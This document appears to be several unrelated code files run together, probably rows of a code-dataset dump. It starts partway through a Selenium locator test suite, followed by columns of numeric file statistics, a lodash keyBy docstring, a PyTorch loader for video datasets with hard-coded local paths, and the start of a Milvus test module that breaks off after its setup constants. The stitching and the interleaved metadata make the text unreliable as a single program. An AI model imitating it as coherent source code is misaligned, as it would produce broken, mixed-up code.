@pytest.mark.xfail_phantomjs(raises=NoSuchWindowException)
def test_Finding_ASingle_Element_By_Empty_Name_Should_Throw(driver, pages):
pages.load("formPage.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.NAME, "")
@pytest.mark.xfail_phantomjs(raises=NoSuchElementException)
def test_Finding_Multiple_Elements_By_Empty_Name_Should_Return_Empty_List(driver, pages):
pages.load("formPage.html")
elements = driver.find_elements(By.NAME, "")
assert len(elements) == 0
def test_Finding_ASingle_Element_By_Name_With_Space_Should_Throw(driver, pages):
pages.load("formPage.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.NAME, "nonexistent button")
def test_Finding_Multiple_Elements_By_Name_With_Space_Should_Return_Empty_List(driver, pages):
pages.load("formPage.html")
elements = driver.find_elements(By.NAME, "nonexistent button")
assert len(elements) == 0
# By.tag_Name positive
def test_Should_Be_Able_To_Find_ASingle_Element_By_Tag_Name(driver, pages):
pages.load("formPage.html")
element = driver.find_element(By.TAG_NAME, "input")
assert element.tag_name.lower() == "input"
def test_Should_Be_Able_To_Find_Multiple_Elements_By_Tag_Name(driver, pages):
pages.load("formPage.html")
elements = driver.find_elements(By.TAG_NAME, "input")
assert len(elements) > 1
# By.tag_Name negative
def test_Should_Not_Be_Able_To_Locate_By_Tag_Name_ASingle_Element_That_Does_Not_Exist(driver, pages):
pages.load("formPage.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.TAG_NAME, "non_Existent_Button")
def test_Should_Not_Be_Able_To_Locate_By_Tag_Name_Multiple_Elements_That_Do_Not_Exist(driver, pages):
pages.load("formPage.html")
elements = driver.find_elements(By.TAG_NAME, "non_Existent_Button")
assert len(elements) == 0
@pytest.mark.xfail_chrome(
reason='https://bugs.chromium.org/p/chromedriver/issues/detail?id=1541')
@pytest.mark.xfail_phantomjs
def test_Finding_ASingle_Element_By_Empty_Tag_Name_Should_Throw(driver, pages):
pages.load("formPage.html")
with pytest.raises(InvalidSelectorException):
driver.find_element(By.TAG_NAME, "")
@pytest.mark.xfail_chrome(
reason='https://bugs.chromium.org/p/chromedriver/issues/detail?id=1541')
@pytest.mark.xfail_phantomjs
def test_Finding_Multiple_Elements_By_Empty_Tag_Name_Should_Throw(driver, pages):
pages.load("formPage.html")
with pytest.raises(InvalidSelectorException):
driver.find_elements(By.TAG_NAME, "")
def test_Finding_ASingle_Element_By_Tag_Name_With_Space_Should_Throw(driver, pages):
pages.load("formPage.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.TAG_NAME, "nonexistent button")
def test_Finding_Multiple_Elements_By_Tag_Name_With_Space_Should_Return_Empty_List(driver, pages):
pages.load("formPage.html")
elements = driver.find_elements(By.TAG_NAME, "nonexistent button")
assert len(elements) == 0
# By.class_Name positive
def test_Should_Be_Able_To_Find_ASingle_Element_By_Class(driver, pages):
pages.load("xhtmlTest.html")
element = driver.find_element(By.CLASS_NAME, "extraDiv")
assert "Another div starts here." in element.text
def test_Should_Be_Able_To_Find_Multiple_Elements_By_Class_Name(driver, pages):
pages.load("xhtmlTest.html")
elements = driver.find_elements(By.CLASS_NAME, "nameC")
assert len(elements) > 1
def test_Should_Find_Element_By_Class_When_It_Is_The_First_Name_Among_Many(driver, pages):
pages.load("xhtmlTest.html")
element = driver.find_element(By.CLASS_NAME, "nameA")
assert element.text == "An H2 title"
def test_Should_Find_Element_By_Class_When_It_Is_The_Last_Name_Among_Many(driver, pages):
pages.load("xhtmlTest.html")
element = driver.find_element(By.CLASS_NAME, "nameC")
assert element.text == "An H2 title"
def test_Should_Find_Element_By_Class_When_It_Is_In_The_Middle_Among_Many(driver, pages):
pages.load("xhtmlTest.html")
element = driver.find_element(By.CLASS_NAME, "nameBnoise")
assert element.text == "An H2 title"
def test_Should_Find_Element_By_Class_When_Its_Name_Is_Surrounded_By_Whitespace(driver, pages):
pages.load("xhtmlTest.html")
element = driver.find_element(By.CLASS_NAME, "spaceAround")
assert element.text == "Spaced out"
def test_Should_Find_Elements_By_Class_When_Its_Name_Is_Surrounded_By_Whitespace(driver, pages):
pages.load("xhtmlTest.html")
elements = driver.find_elements(By.CLASS_NAME, "spaceAround")
assert len(elements) == 1
assert elements[0].text == "Spaced out"
# By.class_Name negative
def test_Should_Not_Find_Element_By_Class_When_The_Name_Queried_Is_Shorter_Than_Candidate_Name(driver, pages):
pages.load("xhtmlTest.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.CLASS_NAME, "name_B")
@pytest.mark.xfail_phantomjs(raises=NoSuchWindowException)
def test_Finding_ASingle_Element_By_Empty_Class_Name_Should_Throw(driver, pages):
pages.load("xhtmlTest.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.CLASS_NAME, "")
def test_Finding_Multiple_Elements_By_Empty_Class_Name_Should_Throw(driver, pages):
pages.load("xhtmlTest.html")
with pytest.raises(NoSuchElementException):
driver.find_elements(By.CLASS_NAME, "")
@pytest.mark.xfail_phantomjs(raises=WebDriverException)
def test_Finding_ASingle_Element_By_Compound_Class_Name_Should_Throw(driver, pages):
pages.load("xhtmlTest.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.CLASS_NAME, "a b")
@pytest.mark.xfail_phantomjs(raises=InvalidElementStateException)
def test_Finding_ASingle_Element_By_Invalid_Class_Name_Should_Throw(driver, pages):
pages.load("xhtmlTest.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.CLASS_NAME, "!@#$%^&*")
@pytest.mark.xfail_phantomjs(raises=InvalidElementStateException)
def test_Finding_Multiple_Elements_By_Invalid_Class_Name_Should_Throw(driver, pages):
pages.load("xhtmlTest.html")
with pytest.raises(NoSuchElementException):
driver.find_elements(By.CLASS_NAME, "!@#$%^&*")
# By.xpath positive
def test_Should_Be_Able_To_Find_ASingle_Element_By_XPath(driver, pages):
pages.load("xhtmlTest.html")
element = driver.find_element(By.XPATH, "//h1")
assert element.text == "XHTML Might Be The Future"
def test_Should_Be_Able_To_Find_Multiple_Elements_By_XPath(driver, pages):
pages.load("xhtmlTest.html")
elements = driver.find_elements(By.XPATH, "//div")
assert len(elements) == 13
def test_Should_Be_Able_To_Find_Many_Elements_Repeatedly_By_XPath(driver, pages):
pages.load("xhtmlTest.html")
xpath = "//node()[contains(@id,'id')]"
assert len(driver.find_elements(By.XPATH, xpath)) == 3
xpath = "//node()[contains(@id,'nope')]"
assert len(driver.find_elements(By.XPATH, xpath)) == 0
def test_Should_Be_Able_To_Identify_Elements_By_Class(driver, pages):
pages.load("xhtmlTest.html")
header = driver.find_element(By.XPATH, "//h1[@class='header']")
assert header.text == "XHTML Might Be The Future"
def test_Should_Be_Able_To_Find_An_Element_By_XPath_With_Multiple_Attributes(driver, pages):
pages.load("formPage.html")
element = driver.find_element(
By.XPATH, "//form[@name='optional']/input[@type='submit' and @value='Click!']")
assert element.tag_name.lower() == "input"
assert element.get_attribute("value") == "Click!"
def test_Finding_ALink_By_Xpath_Should_Locate_An_Element_With_The_Given_Text(driver, pages):
pages.load("xhtmlTest.html")
element = driver.find_element(By.XPATH, "//a[text()='click me']")
assert element.text == "click me"
def test_Finding_ALink_By_Xpath_Using_Contains_Keyword_Should_Work(driver, pages):
pages.load("nestedElements.html")
element = driver.find_element(By.XPATH, "//a[contains(.,'hello world')]")
assert "hello world" in element.text
@pytest.mark.xfail_chrome(raises=InvalidSelectorException)
@pytest.mark.xfail_firefox(raises=InvalidSelectorException)
@pytest.mark.xfail_remote(raises=InvalidSelectorException)
@pytest.mark.xfail_marionette(raises=WebDriverException)
@pytest.mark.xfail_phantomjs(raises=InvalidSelectorException)
@pytest.mark.xfail_safari(raises=NoSuchElementException)
def test_Should_Be_Able_To_Find_Element_By_XPath_With_Namespace(driver, pages):
pages.load("svgPage.html")
element = driver.find_element(By.XPATH, "//svg:svg//svg:text")
assert element.text == "Test Chart"
def test_Should_Be_Able_To_Find_Element_By_XPath_In_Xml_Document(driver, pages):
pages.load("simple.xml")
element = driver.find_element(By.XPATH, "//foo")
assert "baz" in element.text
# By.xpath negative
def test_Should_Throw_An_Exception_When_There_Is_No_Link_To_Click(driver, pages):
pages.load("xhtmlTest.html")
with pytest.raises(NoSuchElementException):
driver.find_element(By.XPATH, "//a[@id='Not here']")
def test_Should_Throw_InvalidSelectorException_When_XPath_Is_Syntactically_Invalid_In_Driver_Find_Element(driver, pages):
pages.load("formPage.html")
with pytest.raises(InvalidSelectorException):
driver.find_element(By.XPATH, "this][isnot][valid")
def test_Should_Throw_InvalidSelectorException_When_XPath_Is_Syntactically_Invalid_In_Driver_Find_Elements(driver, pages):
pages.load("formPage.html")
with pytest.raises(InvalidSelectorException):
driver.find_elements(By.XPATH, "this][isnot][valid")
def test_Should_Throw_InvalidSelectorException_When_XPath_Is_Syntactically_Invalid_In_Element_Find_Element(driver, pages):
pages.load("formPage.html")
body = driver.find_element(By.TAG_NAME, "body")
with pytest.raises(InvalidSelectorException):
body.find_element(By.XPATH, "this][isnot][valid")
def test_Should_Throw_InvalidSelectorException_When_XPath_Is_Syntactically_Invalid_In_Element_Find_Elements(driver, pages):
pages.load("formPage.html")
body = driver.find_element(By.TAG_NAME, "body")
with pytest.raises(InvalidSelectorException):
body.find_elements(By.XPATH, "this][isnot][valid")
def test_Should_Throw_InvalidSelectorException_When_XPath_Returns_Wrong_Type_In_Driver_Find_Element(driver, pages):
pages.load("formPage.html")
with pytest.raises(InvalidSelectorException):
driver.find_element(By.XPATH, "count(//input)")
def test_Should_Throw_InvalidSelectorException_When_XPath_Returns_Wrong_Type_In_Driver_Find_Elements(driver, pages):
pages.load("formPage.html")
with pytest.raises(InvalidSelectorException):
driver.find_elements(By.XPATH, "count(//input)")
def test_Should_Throw_InvalidSelectorException_When_XPath_Returns_Wrong_Type_In_Element_Find_Element(driver, pages):
pages.load("formPage.html")
body = driver.find_element(By.TAG_NAME, "body")
with pytest.raises(InvalidSelectorException):
body.find_element(By.XPATH, "count(//input)")
def test_Should_Throw_InvalidSelectorException_When_XPath_Returns_Wrong_Type_In_Element_Find_Elements(driver, pages):
pages.load("formPage.html")
body = driver.find_element(By.TAG_NAME, "body")
with pytest.raises(InvalidSelectorException):
body.find_elements(By.XPATH, "count(//input)")
# By.css_Selector positive
def test_Should_Be_Able_To_Find_ASingle_Element_By_Css_Selector(driver, pages):
    """A tag.class CSS selector locates the matching element."""
    pages.load("xhtmlTest.html")
    element = driver.find_element(By.CSS_SELECTOR, "div.content")
    assert element.tag_name.lower() == "div"
    assert element.get_attribute("class") == "content"


def test_Should_Be_Able_To_Find_Multiple_Elements_By_Css_Selector(driver, pages):
    """find_elements with a tag selector returns every match on the page."""
    pages.load("xhtmlTest.html")
    elements = driver.find_elements(By.CSS_SELECTOR, "p")
    assert len(elements) > 1


def test_Should_Be_Able_To_Find_ASingle_Element_By_Compound_Css_Selector(driver, pages):
    """With a comma-grouped selector, find_element returns a single element;
    on this page that is the div with class 'content'."""
    pages.load("xhtmlTest.html")
    element = driver.find_element(By.CSS_SELECTOR, "div.extraDiv, div.content")
    assert element.tag_name.lower() == "div"
    assert element.get_attribute("class") == "content"


def test_Should_Be_Able_To_Find_Multiple_Elements_By_Compound_Css_Selector(driver, pages):
    """A comma-grouped selector returns matches for every alternative; on
    this page div.content is returned before div.extraDiv."""
    pages.load("xhtmlTest.html")
    elements = driver.find_elements(By.CSS_SELECTOR, "div.extraDiv, div.content")
    assert len(elements) > 1
    assert elements[0].get_attribute("class") == "content"
    assert elements[1].get_attribute("class") == "extraDiv"


def test_Should_Be_Able_To_Find_An_Element_By_Boolean_Attribute_Using_Css_Selector(driver, pages):
    """Explicit [selected='selected'] attribute syntax matches the selected
    option."""
    pages.load("locators_tests/boolean_attribute_selected.html")
    element = driver.find_element(By.CSS_SELECTOR, "option[selected='selected']")
    assert element.get_attribute("value") == "two"


def test_Should_Be_Able_To_Find_An_Element_By_Boolean_Attribute_Using_Short_Css_Selector(driver, pages):
    """The bare [selected] form matches the boolean attribute too."""
    pages.load("locators_tests/boolean_attribute_selected.html")
    element = driver.find_element(By.CSS_SELECTOR, "option[selected]")
    assert element.get_attribute("value") == "two"


def test_Should_Be_Able_To_Find_An_Element_By_Boolean_Attribute_Using_Short_Css_Selector_On_Html4Page(driver, pages):
    """[selected] also works on an HTML4 (non-XHTML) document."""
    pages.load("locators_tests/boolean_attribute_selected_html4.html")
    element = driver.find_element(By.CSS_SELECTOR, "option[selected]")
    assert element.get_attribute("value") == "two"
# By.css_Selector negative
def test_Should_Not_Find_Element_By_Css_Selector_When_There_Is_No_Such_Element(driver, pages):
    """find_element raises NoSuchElementException for an unmatched selector."""
    pages.load("xhtmlTest.html")
    with pytest.raises(NoSuchElementException):
        driver.find_element(By.CSS_SELECTOR, ".there-is-no-such-class")


def test_Should_Not_Find_Elements_By_Css_Selector_When_There_Is_No_Such_Element(driver, pages):
    """find_elements returns an empty list (does not raise) when nothing
    matches."""
    pages.load("xhtmlTest.html")
    elements = driver.find_elements(By.CSS_SELECTOR, ".there-is-no-such-class")
    assert len(elements) == 0


@pytest.mark.xfail_phantomjs(raises=NoSuchWindowException)
def test_Finding_ASingle_Element_By_Empty_Css_Selector_Should_Throw(driver, pages):
    """An empty CSS selector string is rejected by find_element."""
    pages.load("xhtmlTest.html")
    with pytest.raises(NoSuchElementException):
        driver.find_element(By.CSS_SELECTOR, "")


def test_Finding_Multiple_Elements_By_Empty_Css_Selector_Should_Throw(driver, pages):
    """An empty CSS selector string is rejected by find_elements as well."""
    pages.load("xhtmlTest.html")
    with pytest.raises(NoSuchElementException):
        driver.find_elements(By.CSS_SELECTOR, "")


@pytest.mark.xfail_phantomjs(raises=InvalidElementStateException)
def test_Finding_ASingle_Element_By_Invalid_Css_Selector_Should_Throw(driver, pages):
    """XPath syntax passed as a CSS selector must fail."""
    pages.load("xhtmlTest.html")
    with pytest.raises(NoSuchElementException):
        driver.find_element(By.CSS_SELECTOR, "//a/b/c[@id='1']")


@pytest.mark.xfail_phantomjs(raises=InvalidElementStateException)
def test_Finding_Multiple_Elements_By_Invalid_Css_Selector_Should_Throw(driver, pages):
    """XPath syntax passed as a CSS selector must fail for find_elements too."""
    pages.load("xhtmlTest.html")
    with pytest.raises(NoSuchElementException):
        driver.find_elements(By.CSS_SELECTOR, "//a/b/c[@id='1']")
# By.link_Text positive
def test_Should_Be_Able_To_Find_ALink_By_Text(driver, pages):
    """Exact link text locates the anchor."""
    pages.load("xhtmlTest.html")
    link = driver.find_element(By.LINK_TEXT, "click me")
    assert link.text == "click me"


def test_Should_Be_Able_To_Find_Multiple_Links_By_Text(driver, pages):
    """The page contains exactly two 'click me' links."""
    pages.load("xhtmlTest.html")
    elements = driver.find_elements(By.LINK_TEXT, "click me")
    assert len(elements) == 2


def test_Should_Find_Element_By_Link_Text_Containing_Equals_Sign(driver, pages):
    """A literal '=' in the link text must not be treated specially."""
    pages.load("xhtmlTest.html")
    element = driver.find_element(By.LINK_TEXT, "Link=equalssign")
    assert element.get_attribute("id") == "linkWithEqualsSign"
def test_Should_Find_Multiple_Elements_By_Link_Text_Containing_Equals_Sign(driver, pages):
    """find_elements by full link text containing '=' matches exactly one
    anchor on this page."""
    pages.load("xhtmlTest.html")
    elements = driver.find_elements(By.LINK_TEXT, "Link=equalssign")
    # Consistency fix: the original used Yoda-style `assert 1 == len(elements)`
    # while every sibling test asserts `len(...) == expected`.
    assert len(elements) == 1
    assert elements[0].get_attribute("id") == "linkWithEqualsSign"
def test_finds_By_Link_Text_On_Xhtml_Page(driver, pages):
    """Link-text lookup also works on a true XHTML document."""
    pages.load("actualXhtmlPage.xhtml")
    link_Text = "Foo"
    element = driver.find_element(By.LINK_TEXT, link_Text)
    assert element.text == link_Text


def test_Link_With_Formatting_Tags(driver, pages):
    """Partial link text matches across inline formatting tags inside the
    anchor."""
    pages.load("simpleTest.html")
    elem = driver.find_element(By.ID, "links")
    res = elem.find_element(By.PARTIAL_LINK_TEXT, "link with formatting tags")
    assert res.text == "link with formatting tags"


# NOTE(review): "Link_Test" in the name below looks like a typo for
# "Link_Text"; renaming would change the collected test id, so it is kept.
def test_Driver_Can_Get_Link_By_Link_Test_Ignoring_Trailing_Whitespace(driver, pages):
    """Trailing whitespace in the anchor text is ignored when matching by
    link text."""
    pages.load("simpleTest.html")
    link = driver.find_element(By.LINK_TEXT, "link with trailing space")
    assert link.get_attribute("id") == "linkWithTrailingSpace"
    assert link.text == "link with trailing space"
# By.link_Text negative
def test_Should_Not_Be_Able_To_Locate_By_Link_Text_ASingle_Element_That_Does_Not_Exist(driver, pages):
    """find_element raises when no link has the given text."""
    pages.load("xhtmlTest.html")
    with pytest.raises(NoSuchElementException):
        driver.find_element(By.LINK_TEXT, "Not here either")


def test_Should_Not_Be_Able_To_Locate_By_Link_Text_Multiple_Elements_That_Do_Not_Exist(driver, pages):
    """find_elements returns an empty list when no link has the given text."""
    pages.load("xhtmlTest.html")
    elements = driver.find_elements(By.LINK_TEXT, "Not here either")
    assert len(elements) == 0
# By.partial_Link_Text positive
def test_Should_Be_Able_To_Find_Multiple_Elements_By_Partial_Link_Text(driver, pages):
    """'ick me' is a substring of both 'click me' links."""
    pages.load("xhtmlTest.html")
    elements = driver.find_elements(By.PARTIAL_LINK_TEXT, "ick me")
    assert len(elements) == 2


def test_Should_Be_Able_To_Find_ASingle_Element_By_Partial_Link_Text(driver, pages):
    """Partial text locates a link containing the fragment."""
    pages.load("xhtmlTest.html")
    element = driver.find_element(By.PARTIAL_LINK_TEXT, "anon")
    assert "anon" in element.text


def test_Should_Find_Element_By_Partial_Link_Text_Containing_Equals_Sign(driver, pages):
    """A literal '=' inside the partial text is matched verbatim."""
    pages.load("xhtmlTest.html")
    element = driver.find_element(By.PARTIAL_LINK_TEXT, "Link=")
    assert element.get_attribute("id") == "linkWithEqualsSign"


def test_Should_Find_Multiple_Elements_By_Partial_Link_Text_Containing_Equals_Sign(driver, pages):
    """Only one link on the page contains 'Link='."""
    pages.load("xhtmlTest.html")
    elements = driver.find_elements(By.PARTIAL_LINK_TEXT, "Link=")
    assert len(elements) == 1
    assert elements[0].get_attribute("id") == "linkWithEqualsSign"
# Misc tests
def test_Driver_Should_Be_Able_To_Find_Elements_After_Loading_More_Than_One_Page_At_ATime(driver, pages):
    """Element lookup still works after navigating through multiple pages."""
    pages.load("formPage.html")
    pages.load("xhtmlTest.html")
    link = driver.find_element(By.LINK_TEXT, "click me")
    assert link.text == "click me"
# You don't want to ask why this is here
def test_When_Finding_By_Name_Should_Not_Return_By_Id(driver, pages):
    """Locating by NAME and by ID must stay independent even when one
    element's id equals another element's name."""
    pages.load("formPage.html")
    # Each value is both some element's name and another element's id;
    # check the two elements in the same order as a name lookup then an
    # id lookup, for each value in turn.
    for locator_value in ("id-name1", "id-name2"):
        by_name = driver.find_element(By.NAME, locator_value)
        assert by_name.get_attribute("value") == "name"
        by_id = driver.find_element(By.ID, locator_value)
        assert by_id.get_attribute("value") == "id"
def test_Should_Be_Able_To_Find_AHidden_Elements_By_Name(driver, pages):
    """Hidden inputs are still locatable by NAME."""
    pages.load("formPage.html")
    element = driver.find_element(By.NAME, "hidden")
    assert element.get_attribute("name") == "hidden"


@pytest.mark.xfail_marionette(
    reason='https://bugzilla.mozilla.org/show_bug.cgi?id=1312674',
    run=False)
def test_Should_Not_Be_Able_To_Find_An_Element_On_ABlank_Page(driver, pages):
    """about:blank has no anchors, so find_element must raise."""
    driver.get("about:blank")
    with pytest.raises(NoSuchElementException):
        driver.find_element(By.TAG_NAME, "a")
| 37.527607
| 123
| 0.774522
| 3,369
| 24,468
| 5.267438
| 0.08786
| 0.049701
| 0.079342
| 0.099177
| 0.854164
| 0.818832
| 0.784628
| 0.752113
| 0.715203
| 0.697509
| 0
| 0.003147
| 0.11701
| 24,468
| 651
| 124
| 37.585253
| 0.818237
| 0.045611
| 0
| 0.438554
| 0
| 0
| 0.136976
| 0.017326
| 0
| 0
| 0
| 0
| 0.168675
| 1
| 0.214458
| false
| 0
| 0.007229
| 0
| 0.221687
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
861d752047ab52898bef08692dfab9cff74785f4
| 689
|
py
|
Python
|
src/flask_graphql_pandas/utilities/deprecated/key_by.py
|
p768lwy3/flask-graphql-pandas
|
f343d1e49049b73210ce37ac02254e0b910ea0b9
|
[
"MIT"
] | 2
|
2019-11-04T08:40:41.000Z
|
2020-03-19T19:37:05.000Z
|
src/flask_graphql_pandas/utilities/deprecated/key_by.py
|
p768lwy3/flask-graphql-pandas
|
f343d1e49049b73210ce37ac02254e0b910ea0b9
|
[
"MIT"
] | null | null | null |
src/flask_graphql_pandas/utilities/deprecated/key_by.py
|
p768lwy3/flask-graphql-pandas
|
f343d1e49049b73210ce37ac02254e0b910ea0b9
|
[
"MIT"
] | null | null | null |
"""
In lodash,
#. List of json => json of json
#. _.keyBy("(Key-String)")([
{"(Key-String)": <key-value>, "(String)": <value>, "(String)": <value>, ...},
{"(Key-String)": <key-value>, "(String)": <value>, "(String)": <value>, ...},
...
]) => {
<key-value>: {"(String)": <value>, "(String)": <value>, ...},
<key-value>: {"(String)": <value>, "(String)": <value>, ...},
...
}
#. _.keyBy("(Key-String)").mapValue("(Map-String)")([
{"(Key-String)": <key-value>, "(Map-String)": <map-value>, ...},
{"(Key-String)": <key-value>, "(Map-String)": <map-value>, ...},
...
]) => {
<key-value>: <map-value>,
<key-value>: <map-value>,
...
}
"""
| 24.607143
| 81
| 0.454282
| 69
| 689
| 4.507246
| 0.15942
| 0.205788
| 0.411576
| 0.21865
| 0.803859
| 0.765273
| 0.672026
| 0.672026
| 0.672026
| 0.289389
| 0
| 0
| 0.181422
| 689
| 27
| 82
| 25.518519
| 0.551418
| 0.984035
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8686f6e62b21500c986bd6f828adff7bd6a73952
| 5,563
|
py
|
Python
|
dataset.py
|
LiliMeng/3D-ResNets-PyTorch
|
8b8b9f5ef1c9806875f76513e759235eda669236
|
[
"MIT"
] | 2
|
2018-07-09T01:58:56.000Z
|
2018-07-09T01:59:03.000Z
|
dataset.py
|
LiliMeng/3D-ResNets-PyTorch
|
8b8b9f5ef1c9806875f76513e759235eda669236
|
[
"MIT"
] | null | null | null |
dataset.py
|
LiliMeng/3D-ResNets-PyTorch
|
8b8b9f5ef1c9806875f76513e759235eda669236
|
[
"MIT"
] | 1
|
2020-02-21T12:53:59.000Z
|
2020-02-21T12:53:59.000Z
|
from datasets.kinetics import Kinetics
from datasets.activitynet import ActivityNet
from datasets.ucf101 import UCF101
from datasets.hmdb51 import HMDB51
from datasets.moments import Moments
def get_training_set(opt, spatial_transform, temporal_transform,
                     target_transform):
    """Build the training dataset selected by ``opt.dataset``.

    Args:
        opt: parsed options; must provide ``dataset``, ``video_path`` and
            ``annotation_path`` (plus whatever the chosen class reads).
        spatial_transform, temporal_transform, target_transform:
            transform callables forwarded to the dataset constructor.

    Returns:
        A dataset instance for the 'training' subset.
    """
    assert opt.dataset in ['kinetics', 'activitynet', 'ucf101', 'hmdb51', 'moments']
    transform_kwargs = dict(
        spatial_transform=spatial_transform,
        temporal_transform=temporal_transform,
        target_transform=target_transform)
    # These three classes were called with identical argument lists, so the
    # duplicated branches are collapsed into one table lookup.
    simple_datasets = {'kinetics': Kinetics, 'ucf101': UCF101, 'hmdb51': HMDB51}
    if opt.dataset in simple_datasets:
        training_data = simple_datasets[opt.dataset](
            opt.video_path,
            opt.annotation_path,
            'training',
            **transform_kwargs)
    elif opt.dataset == 'activitynet':
        training_data = ActivityNet(
            opt.video_path,
            opt.annotation_path,
            'training',
            False,  # positional flag forwarded unchanged; semantics defined by ActivityNet
            **transform_kwargs)
    else:  # 'moments' (guaranteed by the assert above)
        # NOTE(review): machine-specific absolute path instead of
        # opt.video_path -- preserved as-is, but confirm before reuse.
        training_data = Moments(
            "/media/lili/fce9875a-a5c8-4c35-8f60-db60be29ea5d/Moments_in_Time_Raw/training/",
            opt.annotation_path,
            'training',
            **transform_kwargs)
    return training_data
def get_validation_set(opt, spatial_transform, temporal_transform,
                       target_transform):
    """Build the validation dataset selected by ``opt.dataset``.

    Same contract as ``get_training_set`` but for the 'validation' subset;
    most datasets additionally receive ``opt.n_val_samples`` and
    ``opt.sample_duration``.

    Returns:
        A dataset instance for the 'validation' subset.
    """
    assert opt.dataset in ['kinetics', 'activitynet', 'ucf101', 'hmdb51', 'moments']
    # These three classes were called with identical argument lists.
    simple_datasets = {'kinetics': Kinetics, 'ucf101': UCF101, 'hmdb51': HMDB51}
    if opt.dataset in simple_datasets:
        validation_data = simple_datasets[opt.dataset](
            opt.video_path,
            opt.annotation_path,
            'validation',
            opt.n_val_samples,
            spatial_transform,
            temporal_transform,
            target_transform,
            sample_duration=opt.sample_duration)
    elif opt.dataset == 'activitynet':
        validation_data = ActivityNet(
            opt.video_path,
            opt.annotation_path,
            'validation',
            False,  # positional flag forwarded unchanged; semantics defined by ActivityNet
            opt.n_val_samples,
            spatial_transform,
            temporal_transform,
            target_transform,
            sample_duration=opt.sample_duration)
    else:  # 'moments' (guaranteed by the assert above)
        # NOTE(review): unlike the other branches this one passes neither
        # n_val_samples nor sample_duration and uses a hard-coded local
        # path -- preserved as-is; confirm intent.
        validation_data = Moments(
            "/media/lili/fce9875a-a5c8-4c35-8f60-db60be29ea5d/Moments_in_Time_Raw/validation/",
            opt.annotation_path,
            'validation',
            spatial_transform=spatial_transform,
            temporal_transform=temporal_transform,
            target_transform=target_transform)
    return validation_data
def get_test_set(opt, spatial_transform, temporal_transform, target_transform):
    """Build the test dataset selected by ``opt.dataset``.

    ``opt.test_subset`` chooses between the 'validation' and 'testing'
    subset of the annotations. 'moments' is intentionally not supported
    here (it is absent from the assert below).

    Returns:
        A dataset instance for the resolved subset.
    """
    assert opt.dataset in ['kinetics', 'activitynet', 'ucf101', 'hmdb51']
    assert opt.test_subset in ['val', 'test']
    # Map the CLI flag to the subset name used in the annotation files.
    subset = 'validation' if opt.test_subset == 'val' else 'testing'
    if opt.dataset == 'kinetics':
        # Kinetics is the only dataset that also takes sample_stride.
        test_data = Kinetics(
            opt.video_path,
            opt.annotation_path,
            subset,
            0,  # positional argument preserved from the original call
            spatial_transform,
            temporal_transform,
            target_transform,
            sample_duration=opt.sample_duration,
            sample_stride=opt.sample_stride)
    elif opt.dataset == 'activitynet':
        test_data = ActivityNet(
            opt.video_path,
            opt.annotation_path,
            subset,
            True,  # positional flag forwarded unchanged; semantics defined by ActivityNet
            0,
            spatial_transform,
            temporal_transform,
            target_transform,
            sample_duration=opt.sample_duration)
    else:
        # ucf101 and hmdb51 share an identical constructor call.
        dataset_cls = UCF101 if opt.dataset == 'ucf101' else HMDB51
        test_data = dataset_cls(
            opt.video_path,
            opt.annotation_path,
            subset,
            0,
            spatial_transform,
            temporal_transform,
            target_transform,
            sample_duration=opt.sample_duration)
    return test_data
| 33.920732
| 95
| 0.599137
| 516
| 5,563
| 6.162791
| 0.094961
| 0.115723
| 0.18805
| 0.176415
| 0.80283
| 0.80283
| 0.80283
| 0.795283
| 0.723585
| 0.723585
| 0
| 0.02476
| 0.324825
| 5,563
| 163
| 96
| 34.128834
| 0.821885
| 0
| 0
| 0.764706
| 0
| 0
| 0.088621
| 0.028402
| 0
| 0
| 0
| 0
| 0.026144
| 1
| 0.019608
| false
| 0
| 0.03268
| 0
| 0.071895
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
86902a72556d22ef7d2160dc5f2cc1efe6a54ce4
| 13,208
|
py
|
Python
|
tests/milvus_python_test/entity/test_list_id_in_segment.py
|
dddddai/milvus
|
c6887460451787475f7116f92cfeba4e9239dc44
|
[
"Apache-2.0"
] | 1
|
2021-12-18T16:11:20.000Z
|
2021-12-18T16:11:20.000Z
|
tests/milvus_python_test/entity/test_list_id_in_segment.py
|
ucasfl/milvus
|
7a37de43d8dc0f3c003fe789d5d4d6d95043e40f
|
[
"Apache-2.0"
] | null | null | null |
tests/milvus_python_test/entity/test_list_id_in_segment.py
|
ucasfl/milvus
|
7a37de43d8dc0f3c003fe789d5d4d6d95043e40f
|
[
"Apache-2.0"
] | null | null | null |
import time
import random
import pdb
import threading
import logging
from multiprocessing import Pool, Process
import pytest
from utils import *
# Test-wide constants and pre-generated fixture data shared by the classes
# below (generators come from `utils`).
dim = 128  # vector dimensionality used by the generated entities
segment_row_count = 100000
nb = 6000  # default number of entities inserted by the bulk tests
tag = "1970_01_01"  # partition tag reused across the partition tests
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
collection_id = "list_id_in_segment"  # prefix for generated collection names
entity = gen_entities(1)
raw_vector, binary_entity = gen_binary_entities(1)
entities = gen_entities(nb)
raw_vectors, binary_entities = gen_binary_entities(nb)
default_fields = gen_default_fields()
